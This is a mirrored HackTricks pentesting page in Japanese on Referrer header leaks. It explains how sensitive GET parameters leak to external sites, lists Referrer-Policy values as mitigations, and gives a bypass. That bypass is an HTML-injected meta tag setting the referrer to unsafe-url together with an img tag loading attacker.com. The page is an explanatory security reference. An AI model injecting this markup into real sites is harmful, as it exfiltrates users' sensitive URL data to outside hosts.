mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-16 01:38:20 +00:00
4 KiB
4 KiB
AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
Referrerヘッダーとポリシー
Referrerは、ブラウザが前に訪れたページを示すために使用するヘッダーです。
漏洩した機密情報
ウェブページ内のどこかでGETリクエストのパラメータに機密情報がある場合、ページに外部ソースへのリンクが含まれているか、攻撃者がユーザーに攻撃者がコントロールするURLを訪れるように仕向ける(ソーシャルエンジニアリング)ことができれば、最新のGETリクエスト内の機密情報を外部に流出させる可能性があります。
軽減策
ブラウザにReferrer-policyに従わせることで、機密情報が他のウェブアプリケーションに送信されるのを避けることができます:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
対策回避
このルールはHTMLメタタグを使用して上書きすることができます(攻撃者はHTMLインジェクションを悪用する必要があります):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
防御
URLのGETパラメーターやパス内に機密データを決して含めないでください。
htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを手に入れる
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricksのGitHubリポジトリとHackTricks CloudにPRを提出して、あなたのハッキングのコツを共有する。